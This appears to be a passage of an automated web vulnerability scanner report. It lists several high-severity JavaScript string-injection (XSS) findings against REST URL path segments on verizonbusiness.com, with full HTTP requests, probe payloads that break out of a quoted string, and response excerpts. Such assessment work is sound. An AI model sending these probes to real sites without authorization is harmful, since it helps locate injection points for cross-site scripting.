Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure/computing/caas_smbce7a7";3fec95ae7a4/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.16. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41ab4'%3b481d5c5b252 was submitted in the REST URL parameter 5. This input was echoed as 41ab4';481d5c5b252 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing/caas_smb41ab4'%3b481d5c5b252/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:25 GMT
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure/computing/caas_smb41ab4';481d5c5b252/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.17. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ee7"%3b4fe464cfdc8 was submitted in the REST URL parameter 1. This input was echoed as 52ee7";4fe464cfdc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium52ee7"%3b4fe464cfdc8/solutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21470
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium52ee7";4fe464cfdc8/solutions/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.18. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80946'%3b2f4c28f49f3 was submitted in the REST URL parameter 1. This input was echoed as 80946';2f4c28f49f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium80946'%3b2f4c28f49f3/solutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:14 GMT
Content-Type: text/html
Content-Length: 42617
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium80946';2f4c28f49f3/solutions/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.19. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f377a'%3b4e6a1ff2712 was submitted in the REST URL parameter 2. This input was echoed as f377a';4e6a1ff2712 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/solutionsf377a'%3b4e6a1ff2712/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/solutionsf377a';4e6a1ff2712/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.20. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e014"%3b3f87cc0569c was submitted in the REST URL parameter 2. This input was echoed as 3e014";3f87cc0569c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/solutions3e014"%3b3f87cc0569c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/solutions3e014";3f87cc0569c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.21. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7cac"%3b6347c6331eb was submitted in the REST URL parameter 1. This input was echoed as d7cac";6347c6331eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumd7cac"%3b6347c6331eb/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Mediumd7cac";6347c6331eb/support/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.22. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb22e'%3b1aef5997d13 was submitted in the REST URL parameter 1. This input was echoed as eb22e';1aef5997d13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumeb22e'%3b1aef5997d13/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Mediumeb22e';1aef5997d13/support/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.23. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b093"%3b87092571ce5 was submitted in the REST URL parameter 2. This input was echoed as 7b093";87092571ce5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/support7b093"%3b87092571ce5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:27 GMT
Content-Type: text/html
Content-Length: 21692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/support7b093";87092571ce5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.24. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dff3'%3b89432a0569b was submitted in the REST URL parameter 2. This input was echoed as 9dff3';89432a0569b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/support9dff3'%3b89432a0569b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:37 GMT
Content-Type: text/html
Content-Length: 21692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium/support9dff3';89432a0569b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.25. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 858bb'%3ba75ff52257e was submitted in the REST URL parameter 1. This input was echoed as 858bb';a75ff52257e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products858bb'%3ba75ff52257e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products858bb';a75ff52257e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.26. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f82ff"%3b82f06c69141 was submitted in the REST URL parameter 1. This input was echoed as f82ff";82f06c69141 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsf82ff"%3b82f06c69141/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsf82ff";82f06c69141/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.27. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec852"%3b6fb5f3885aa was submitted in the REST URL parameter 1. This input was echoed as ec852";6fb5f3885aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsec852"%3b6fb5f3885aa/communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsec852";6fb5f3885aa/communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.28. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77697'%3b7b5dd88adbe was submitted in the REST URL parameter 1. This input was echoed as 77697';7b5dd88adbe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products77697'%3b7b5dd88adbe/communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
